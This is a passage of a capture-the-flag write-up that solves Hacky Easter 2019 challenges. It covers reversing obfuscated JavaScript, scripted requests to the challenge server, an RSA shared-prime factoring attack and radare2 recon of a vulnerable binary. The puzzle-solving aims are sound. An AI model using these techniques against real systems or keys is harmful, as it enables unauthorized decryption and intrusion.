class=\"brush: jscript; title: ; notranslate\" title=\"\">\nlet s = 0;\nvar theBox = &#x5B;&#x5B;91968, &quot;16.8.8.10.12.14. ... original theBoxOfCarrots here ...&quot;], ...];\n\nfunction tell_a_story_minimized() {\n  for (var age = 0; age &lt;= 7331; age++) {\n    s+=3;\n    theBox.forEach((o, i) =&gt; {\n      s = o&#x5B;0] + Math.abs(Math.floor(Math.sin(s) * 20));\n      theBox&#x5B;i]&#x5B;0] = s;\n      theBox&#x5B;i]&#x5B;1] += (i + &quot;.&quot;);\n    });\n    theBox = theBox.sort((a, b) =&gt; {return a&#x5B;0] - b&#x5B;0]});\n  }\n}\n<\/pre><\/div>\n<br\/>\n<br\/>Now we can write some javascript code, which reverts the steps done from the original script and thus reveals the secret:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nlet s = 0;\nvar theBox = &#x5B;&#x5B;91968, &quot;16.8.8.10.12.14. ... original theBoxOfCarrots here ...&quot;], ...];\n\nfunction uncoverSecret() {\n  for (var i=0;i&lt;20;i++) theBox&#x5B;i]&#x5B;1] = theBox&#x5B;i]&#x5B;1].substr(0, theBox&#x5B;i]&#x5B;1].length-1);\n  for (var x = 0; x&lt;=7331;x++) theBox = rev(theBox);\n  result = &#x5B;];\n  for (var i = 0; i &lt; 20; i++) result.push(theBox&#x5B;i]&#x5B;0]);\n  console.log(result);\n}\n\nfunction rev(tB) {\n  theNewBox = &#x5B;];\n  for (var i=0;i&lt;20;i++) theNewBox.push(&#x5B;]);\n  for (var i=0;i&lt;20;i++) {\n    idxArray = tB&#x5B;i]&#x5B;1].split(&#039;.&#039;);\n\toldIdx = idxArray.pop();\n\ttheNewBox&#x5B;oldIdx] = tB&#x5B;i];\n\ttheNewBox&#x5B;oldIdx]&#x5B;1] = idxArray.join(&#039;.&#039;);\n  }\n  for (var i=19;i&gt;0;i--) {\n    theNewBox&#x5B;i]&#x5B;0] = theNewBox&#x5B;i]&#x5B;0] - Math.abs(Math.floor(Math.sin( theNewBox&#x5B;i-1]&#x5B;0] ) * 20));\n  }\n  old_s = 0;\n  for (var i=0;i&lt;20;i++) {\n    if (theNewBox&#x5B;i]&#x5B;1].length &gt; 0) {\n\t  idxArrayTmp = theNewBox&#x5B;i]&#x5B;1].split(&#039;.&#039;);\n\t  oldIdxTmp = idxArrayTmp&#x5B;idxArrayTmp.length-1];\n\t  if (oldIdxTmp == 19) old_s = theNewBox&#x5B;i]&#x5B;0];\n\t}\n  }\n  theNewBox&#x5B;0]&#x5B;0] = theNewBox&#x5B;0]&#x5B;0] - Math.abs(Math.floor(Math.sin( old_s+3 ) * 20));\n\n  return theNewBox;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>Running the function <code>uncoverSecret<\/code> takes a while, but finally outputs the original values stored in <code>theBoxOfCarrots<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_21.png\" width=\"500\"\/>\n<br\/>\n<br\/>Ok, but what is the flag? Remember the variable <code>a<\/code> from the original source code?\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nlet a = &#x5B;&#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#039;];\n<\/pre><\/div>\n<br\/>\n<br\/>The outputted values are supposed to be used as an index of <code>a<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_22.png\" width=\"500\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-JfsM-ywiw-mSxE-yfYa<\/span>.\n<br\/>\n<h1 id=\"chlg22\">22 &#8211; The Hunt: Muddy Quagmire<\/h1>\nIn the same manner as described in <a href=\"#chlg21\">egg21<\/a>, I started by creating a map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>Let&#8217;s have a look at the single tasks:\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Old Rumpy<\/h3>\n<br\/>The very first tasks requires us to calculate some time offset:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this task, but solved it once manually and then reused the session cookie.\n<br\/>\n<br\/>In this case the time zone of <code>Mogadishu<\/code> is <code>GMT+3<\/code>, which makes the result <code>23:03<\/code>.\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Simon&#8217;s Eyes<\/h3>\n<br\/>The next task is quite simple:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_03.png\" width=\"700\"\/>\n<br\/>\n<br\/>We only have to enter the steps we made from the start of the maze until now.\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mathonymous<\/h3>\n<br\/>Also the following task, was very easy to solve:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_04.png\" width=\"700\"\/>\n<br\/>\n<br\/>We only have to calculate the correct result. In this case <code>76*49+21-33 = 3712<\/code>. This could have also been easily automated using <code>eval<\/code>. Though, it is not necessary if we save the session cookie.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Randonacci<\/h3>\n<br\/>This task also contains a very specific hint:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_05.png\" width=\"700\"\/>\n<br\/>\n<br\/>Although the hint was very specific, it took me a while to understand that my solution was not working since I used <code>python2<\/code>. The pseudorandom number generator used in <code>python2<\/code> seems to differ from the one used in <code>python3<\/code>. This task requires us to use <code>python3<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/python3\n\nimport random\nrandom.seed(1337)\nfibo = &#x5B;1,1]\nfor i in range(150): fibo.append(fibo&#x5B;-1]+fibo&#x5B;-2])\nfor i in fibo: print(i % random.randint(1,i))\n\n<\/pre><\/div>\n<br\/>\n<br\/>At first we initialize the random seed with <code>1337<\/code>. After this we create a few <a href=\"https:\/\/en.wikipedia.org\/wiki\/Fibonacci_sequence\" target=\"_new\" rel=\"noopener noreferrer\">fibonacci<\/a> numbers in order to calculate the actual sequence.\n<br\/>\n<br\/>By running the script and greping for the last number of the sequence before the searched value, we can determine its value:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22\/c4# .\/randonacci.py | grep 33195859417603166742 -A1\n33195859417603166742\n117780214897213996119\n\n<\/pre><\/div>\n<br\/>\n<br\/>The solution is <code>117780214897213996119<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">C0tt0nt4il Ch3ck<\/h3>\n<br\/>For the next task, we have to know the c0tt0nt4il alphabet:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_06.png\" width=\"700\"\/>\n<br\/>\n<br\/>The c0tt0nt4il alphabet is simple a kind of <a href=\"https:\/\/en.wikipedia.org\/wiki\/Leet\" target=\"_new\" rel=\"noopener noreferrer\">leetspeak<\/a>. After a while I figured out, that the green image with the yellow text (<code>bcd3f6h<\/code>) merely shows an excerpt of the c0tt0nt4il alphabet in alphabetic order. <code>3<\/code> is <code>e<\/code> and <code>6<\/code> is <code>g<\/code>, which makes this <code>bcdefgh<\/code>. We only have to submit the next letter, which would be <code>i<\/code> in this case. Though, <code>i<\/code> is actually replaced by <code>1<\/code>. In order to determine which letters are replaced by a number, we can simply rerun the task a few times and inspect the shown excerpt. The full c0tt0nt4il alphabet is <code>4bcd3f6h1jklmn0pqr5tuvwxyz<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Bun Bun&#8217;s Goods &#038; Gadgets<\/h3>\n<br\/>This task offers some goods and gadgets in <code>Bun Bun's shop<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_07.png\" width=\"500\"\/>\n<br\/>\n<br\/>The button beneath the text is linked to <code>http:\/\/whale.hacking-lab.com:5337\/?action=watch<\/code>.\n<br\/>\n<br\/>After clicking on it, we get a lot of redirects (<code>302<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_08.png\" width=\"700\"\/>\n<br\/>\n<br\/>On each redirect another <code>Content-Type<\/code> is returned from the server. The different <code>Content-Type<\/code>s are the actual items of the shop.\n<br\/>\n<br\/>The last redirect leads us to the shop page again. This time there is a new <code>buy<\/code> button, which is linked to <code>http:\/\/whale.hacking-lab.com:5337\/?action=buy<\/code>.\n<br\/>\n<br\/>Clicking on this button gives us a <code>418 I'M A TEAPOT<\/code> status code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_09.png\" width=\"700\"\/>\n<br\/>\n<br\/>This is actually an <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Status\/418\" target=\"_new\" rel=\"noopener noreferrer\">HTTP status code<\/a> added as part of an april fools&#8217; joke in 1998.\n<br\/>\n<br\/>The description of the task stated, that we can buy one item for free. Considering the status code and all items available in the shop, we should definitely but the <code>shop\/teabag<\/code>.\n<br\/>\n<br\/>In order to buy this item, we have to follow all redirects until we receive the <code>Content-Type: shop\/teabag<\/code>. Then we don&#8217;t have to follow the redirect, but visit the route <code>\/?action=buy<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge7(s, resp):\n  r = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?action=watch&#039;, allow_redirects=False)\n  while (r.status_code == 302):\n    print(r.headers&#x5B;&#039;Content-Type&#039;])\n    if (r.headers&#x5B;&#039;Content-Type&#039;] == &#039;shop\/teabag&#039;):\n      s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?action=buy&#039;)\n      resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/&#039;).text\n      if (&#039;One day I will be able to drink tea&#039; in resp): return True\n      return False\n    r = s.get(&#039;http:\/\/whale.hacking-lab.com:5337&#039;, allow_redirects=False)\n  return False\n\nif (solveChallenge7(s, resp)): print(&#039;solved c7!&#039;)\nelse:\n  print(&#039;failure solving c7!&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Sailor John<\/h3>\n<br\/>This task requires some math:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_10.png\" width=\"700\"\/>\n<br\/>\n<br\/>There are two value pairs (<code>p1,c1<\/code> and <code>p2,c2<\/code>) for which we have to find a corresponding <code>x1\/x2<\/code> to fulfil the equation.\n<br\/>\n<br\/>Both <code>p1<\/code> and <code>p2<\/code> are actually primes:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_11.png\" width=\"500\"\/>\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_12.png\" width=\"500\"\/>\n<br\/>\n<br\/>An <a href=\"https:\/\/en.wikipedia.org\/wiki\/Emirp\" target=\"_new\" rel=\"noopener noreferrer\">emirp<\/a> is actually a prime number, which when spelled backwards, is another prime number. In this case there is no real emirp, we are only supposed to spell the given prime backwards. Thus the equation for the first value pair looks like this:\n<br\/>\n<br\/><code>reversed(p1) ^ x1 % p1 = c1<\/code>\n<br\/>\n<br\/><code>71140253671 ^ x1 % 17635204117 = 419785298<\/code>\n<br\/>\n<br\/>Actually this is not an easy equation to solve. Though I found <a href=\"https:\/\/www.alpertron.com.ar\/DILOG.HTM\" target=\"_new\" rel=\"noopener noreferrer\">this amazing page<\/a>, which solves the equation in seconds:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_13.png\" width=\"600\"\/>\n<br\/>\n<br\/>Accordingly the result for <code>x1<\/code> is <code>1647592057<\/code>.\n<br\/>\n<br\/>In the same manner we can calculate the result for <code>x2<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_14.png\" width=\"600\"\/>\n<br\/>\n<br\/>The value of <code>x2<\/code> is <code>305768189495<\/code>.\n<br\/>\n<br\/>At last we have to convert the numbers to ASCII characters:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; hex(1647592057)\n&#039;0x62344279&#039;\n&gt;&gt;&gt; &#039;62344279&#039;.decode(&#039;hex&#039;)\n&#039;b4By&#039;\n&gt;&gt;&gt; hex(305768189495)\n&#039;0x4731344e37&#039;\n&gt;&gt;&gt; &#039;4731344e37&#039;.decode(&#039;hex&#039;)\n&#039;G14N7&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>The secret is <code>b4ByG14N7<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Ran-Dee&#8217;s Secret Algorithm<\/h3>\n<br\/>The second to last task is a RSA crypto challenge:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_15.png\" width=\"700\"\/>\n<br\/>\n<br\/>We have got the 6 values <code>n0<\/code>, <code>n1<\/code>, <code>n2<\/code>, <code>c1<\/code>, <code>c2<\/code> and <code>c3<\/code>.\n<br\/>\n<br\/>Let&#8217;s start with a short review on <a href=\"https:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\" target=\"_new\" rel=\"noopener noreferrer\">RSA<\/a>. <code>n<\/code> is the RSA modulus, which is calculated by multiplying two primes:\n<br\/>\n<br\/><code>n = p * q<\/code>\n<br\/>\n<br\/>As the task description states, the list of available primes was quite small. Actually the size of the smallest odd prime, which is <code>3<\/code>.\n<br\/>\n<br\/><code>c<\/code> is the cipher text, which is produced by raising the plain text (<code>m<\/code>) to the power of <code>e<\/code> (<code>e<\/code> is calculated beforehand but is usually equal to <code>65537<\/code>) modulo <code>n<\/code>:\n<br\/>\n<br\/><code>c = m**e % n<\/code>\n<br\/>\n<br\/>In order to be able to decrypt the message, we need to find the primes <code>p<\/code> and <code>q<\/code>. With those we can calculate the secret exponent <code>d<\/code>, which is used to decrypt a message:\n<br\/>\n<br\/><code>m = c**d % n<\/code>\n<br\/>\n<br\/>Simply factorizing <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code> is quite hard, since the values are very big. Though, we know that there were only three primes involved, which means that <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code> need to share these primes as a factor.\n<br\/>\n<br\/>In order to reveal those primes, we can simply calculate the greatest common divisor (<code>gcd<\/code>) of <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; import gmpy2\n&gt;&gt;&gt; n0=10603199174122839808738169357706062732533966731323858892743816728206914395320609331466...\n&gt;&gt;&gt; n1=56133586686716136655665103829944414072194320629988325233058401869707803703682716186831...\n&gt;&gt;&gt; n2=43197226819995414250880489055413585390503681019180594772781599842207471693041753129885...\n&gt;&gt;&gt; p0=gmpy2.gcd(n0,n1)\n&gt;&gt;&gt; p0\nmpz(1173821128899717744763168991586024137475923012574062580049287532012184965219319828285650431646942194944437493)\n&gt;&gt;&gt; p1=gmpy2.gcd(n0,n2)\n&gt;&gt;&gt; p1\nmpz(9033062119150775356115605417902072538098631081058159551678022048966520848600866260935959311606867286026034943)\n&gt;&gt;&gt; p2=gmpy2.gcd(n1,n2)\n&gt;&gt;&gt; p2\nmpz(4782124405899304514745349491894350894228449009067812460621545024973542842784947583120716593095450482771264061)\n<\/pre><\/div>\n<br\/>\n<br\/>These are the three primes <code>p0<\/code>, <code>p1<\/code> and <code>p2<\/code>.\n<br\/>\n<br\/>Now we know that for example, that <code>n0 = p0 * p1<\/code>. In order to calculate the secret exponent <code>d0<\/code>, we have to calculate the modular invers of <code>e<\/code> modulo <code>phi(n0)<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; phi_n0 = (p0-1)*(p1-1)\n&gt;&gt;&gt; phi_n0\nmpz(10603199174122839808738169357706062732533966731323858892743816728206914395320609331466257631...)\n&gt;&gt;&gt; e=65537\n&gt;&gt;&gt; d0=gmpy2.invert(e,phi_n0)\n&gt;&gt;&gt; d0\nmpz(40588134592858947202620573824980086938840597431789927528306777890432406340755317804979478033...)\n\n<\/pre><\/div>\n<br\/>\n<br\/>Using <code>d0<\/code> we can finally decrypt the cipher text <code>c0<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; c0=88389551551870299015700839894517562236934817747927372766618...\n&gt;&gt;&gt; gmpy2.powmod(c0,d0,n0)\nmpz(516763741385810790760706298905075545750264045813156135838053)\n&gt;&gt;&gt; hex(516763741385810790760706298905075545750264045813156135838053)\n&#039;0x525341336e6372797074216f6e77216c6c6e65766572642165L&#039;\n&gt;&gt;&gt; &#039;525341336e6372797074216f6e77216c6c6e65766572642165&#039;.decode(&#039;hex&#039;)\n&#039;RSA3ncrypt!onw!llneverd!e&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>The plain text is <code>RSA3ncrypt!onw!llneverd!e<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">A mysterious gate<\/h3>\n<br\/>After having solved all previous tasks, we can step to the mysterious gate:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_16.png\" width=\"500\"\/>\n<br\/>\n<br\/>The gate requires use to enter 8 numbers. These numbers are used within the javascript code of the page in order to calculate the final flag. Though only if the result of the computation equals <code>-502491864<\/code>, the flag is actually correct and the gate is opened:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n...\n            function h(s) {\n                return s.split(&quot;&quot;).reduce(function (a, b) {\n                    a = ((a &lt;&lt; 5) - a) + b.charCodeAt(0);\n                    return a &amp; a\n                }, 0);\n            }\n\n            var ca = function (str, amount) {\n                if (Number(amount) &lt; 0)\n                    return ca(str, Number(amount) + 26);\n                var output = &#039;&#039;;\n                for (var i = 0; i &lt; str.length; i++) {\n                    var c = str&#x5B;i];\n                    if (c.match(\/&#x5B;a-z]\/i)) {\n                        var code = str.charCodeAt(i);\n                        if ((code &gt;= 65) &amp;&amp; (code &lt;= 90))\n                            c = String.fromCharCode(((code - 65 + Number(amount)) % 26) + 65);\n                        else if ((code &gt;= 97) &amp;&amp; (code &lt;= 122))\n                            c = String.fromCharCode(((code - 97 + Number(amount)) % 26) + 97);\n                    }\n                    output += c;\n                }\n                return output;\n\n            };\n\n            $(&#039;.door&#039;).click(function () {\n                var n = &#x5B;\n                    $(&#039;#n1&#039;).val(),\n                    $(&#039;#n2&#039;).val(),\n                    $(&#039;#n3&#039;).val(),\n                    $(&#039;#n4&#039;).val(),\n                    $(&#039;#n5&#039;).val(),\n                    $(&#039;#n6&#039;).val(),\n                    $(&#039;#n7&#039;).val(),\n                    $(&#039;#n8&#039;).val()\n                ];\n\n                var g = &#039;Um&#039;;\n                var et = &#039;iT&#039;;\n                var lo = &#039;BG&#039;;\n                var st = &#039;4I&#039;;\n\n                var into = &#039;xr&#039;;\n                var the = &#039;Xp&#039;;\n                var lab = &#039;rr&#039;;\n                var hahaha = &#039;Qv&#039;;\n\n                var ok = ca(&#039;mj19&#039;, -5) + &#039;&lt;br&gt;&#039; +\n                    ca(et, n&#x5B;0]) +\n                    ca(the, n&#x5B;1]) + &#039;&lt;br&gt;&#039; +\n                    ca(g, n&#x5B;2]) +\n                    ca(lo, n&#x5B;3]) + &#039;&lt;br&gt;&#039; +\n                    ca(st, n&#x5B;4]) +\n                    ca(hahaha, n&#x5B;5]) + &#039;&lt;br&gt;&#039; +\n                    ca(into, n&#x5B;6]) +\n                    ca(lab, n&#x5B;7]);\n\n                $(&#039;#key&#039;).html(ok);\n\n                if (h(n.join(&#039;&#039;)) === -502491864) {\n                    $(&#039;.door&#039;).toggleClass(&#039;what&#039;);\n                }\n            });\n<\/pre><\/div>\n<br\/>\n<br\/>According to the quite small input fields, I hoped that the values are not very big and wrote a quick bruteforcer in javascript. Well, it worked out directly:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_17.png\" width=\"500\"\/>\n<br\/>\n<br\/>I was quite lucky with the chosen parameters for the loops (especially the <code>-9<\/code> on the outer loop).\n<br\/>\n<br\/>Finally entering the numbers in the input fields opens the gate:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_18.png\" width=\"500\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-zKZr-YqJO-4OWb-auss<\/span>.\n<br\/>\n<h1 id=\"chlg23\">23 &#8211; The Maze<\/h1>\nThe challenge description provides a binary called <code>maze<\/code> as well as an ip address and port of a server, which is running the binary:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# file maze\nmaze: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.0.0, BuildID&#x5B;sha1]=1a30ee698ef00862581bf5256a0d2ac6764c02d5, stripped\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# nc whale.hacking-lab.com 7331\n...\n\nYour position:\n\n\n\n\n\n   +-----+-----+\n               |\n            X  |\n               |\n   +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>We can navigate through the maze by entering <code>go &lt;direction&gt;<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt; go west\nYour position:\n\n\n\n\n\n   +-----+-----+-----+\n   |                 |\n   |        X        |\n   |                 |\n   +     +-----+-----+\n   |     |\n   |     |\n   |     |\n   +     +\n\n\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>We can also search for items by entering <code>search<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt; search\nYour position:\n\n\n\n\n\n   +-----+-----+-----+\n   |                 |\n   |        X        |\n   |                 |\n   +     +-----+-----+\n   |     |\n   |     |\n   |     |\n   +     +\n\nThere is nothing interesting here.\n\n\nEnter your command:\n&gt; \n<\/pre><\/div>\n<br\/>Let&#8217;s have a look at the binary using <code>checksec<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# checksec maze\n&#x5B;*] &#039;\/root\/Documents\/he19\/egg23\/maze&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\n<\/pre><\/div>\n<br\/>The binary is compiled without stack canaries and position independent code (<i>PIE<\/i>). <i>NX<\/i> is enabled, though.\n<br\/>\n<br\/>We can further inspect the binary using <code>radare2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# r2 -A maze\n&#x5B;x] Analyze all flags starting with sym. and entry0 (aa)\n&#x5B;x] Analyze function calls (aac)\n&#x5B;x] Analyze len bytes of instructions for references (aar)\n&#x5B;x] Constructing a function name for fcn.* and sym.func.* functions (aan)\n&#x5B;x] Type matching analysis for all functions (afta)\n&#x5B;x] Use -AA or aaaa to perform additional experimental analysis.\n&#x5B;0x00400a60]&gt;\n<\/pre><\/div>\n<br\/>&#8230; and start by listing all strings with the command <code>iz<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; iz\n&#x5B;Strings]\nNum Paddr      Vaddr      Len Size Section  Type  String\n000 0x00002048 0x00402048  34  35 (.rodata) ascii There is nothing interesting here.\n001 0x0000206b 0x0040206b  23  24 (.rodata) ascii You found a rusty nail.\n002 0x00002088 0x00402088  37  38 (.rodata) ascii You found an arrow stuck in the wall.\n003 0x000020b0 0x004020b0  77  78 (.rodata) ascii You found a map, but unfortunately someone else has already torn out a piece.\n...\n037 0x000023b0 0x004023b0  16  17 (.rodata) ascii You found a key!\n038 0x000023c1 0x004023c1  25  26 (.rodata) ascii You found a locked chest!\n039 0x000023db 0x004023db   9  10 (.rodata) ascii 2+!)b72HB\n040 0x000023e5 0x004023e5  29  30 (.rodata) ascii Maybe you should search first\n041 0x00002403 0x00402403  23  24 (.rodata) ascii You pick up the key: %s\n042 0x00002420 0x00402420  41  42 (.rodata) ascii This is to heavy! You can&#039;t pick up that.\n043 0x00002450 0x00402450  37  38 (.rodata) ascii There is nothing you want to pick up!\n044 0x00002476 0x00402476   6   7 (.rodata) ascii -2&#039;,HB\n045 0x00002480 0x00402480  45  46 (.rodata) ascii The chest is locked. Please enter the key:\\n&gt;\n046 0x000024b0 0x004024b0  33  34 (.rodata) ascii Sorry but that was the wrong key.\n047 0x000024d8 0x004024d8  57  58 (.rodata) ascii Congratulation, you solved the maze. Here is your reward:\n048 0x00002514 0x00402514   7   8 (.rodata) ascii egg.txt\n\n<\/pre><\/div>\n<br\/>Obviously there seems to be a key, which we can find, as well as a locked chest, which requires this key to be entered.\n<br\/>\n<br\/>By using the <code>axt<\/code> command we can determine where the string <code>\"Congratulation, ...\"<\/code> is used:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; axt @ str.Congratulation__you_solved_the_maze._Here_is_your_reward:\n(nofunc) 0x401cc9 &#x5B;DATA] mov edi, str.Congratulation__you_solved_the_maze._Here_is_your_reward:\n\n<\/pre><\/div>\n<br\/>The address of the string is moved to <code>edi<\/code> at <code>0x401cc9<\/code>. Since radare does not recognize any function around this address, we can simply print the next 30 instructions by using the command <code>pd<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,2,3,8,9,14,15,17,21,22,23]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pd 30 @ 0x401cc9\n            0x00401cc9      bfd8244000     mov edi, str.Congratulation__you_solved_the_maze._Here_is_your_reward: ; 0x4024d8 ; &quot;Congratulation, you solved the maze. Here is your reward:&quot;\n            0x00401cce      e85decffff     call sym.imp.puts\n            0x00401cd3      bf00040000     mov edi, 0x400              ; 1024\n            0x00401cd8      e803edffff     call sym.imp.malloc\n            0x00401cdd      488945e8       mov qword &#x5B;rbp - 0x18], rax\n            0x00401ce1      be12254000     mov esi, 0x402512\n            0x00401ce6      bf14254000     mov edi, str.egg.txt        ; 0x402514 ; &quot;egg.txt&quot;\n            0x00401ceb      e810edffff     call sym.imp.fopen\n            0x00401cf0      488945e0       mov qword &#x5B;rbp - 0x20], rax\n        ,=&lt; 0x00401cf4      eb16           jmp 0x401d0c\n        |   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x706)\n       .--&gt; 0x00401cf6      488b45e8       mov rax, qword &#x5B;rbp - 0x18]\n       :|   0x00401cfa      4889c6         mov rsi, rax\n       :|   0x00401cfd      bf1c254000     mov edi, 0x40251c\n       :|   0x00401d02      b800000000     mov eax, 0\n       :|   0x00401d07      e864ecffff     call sym.imp.printf\n       :|   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x6d6)\n       :`-&gt; 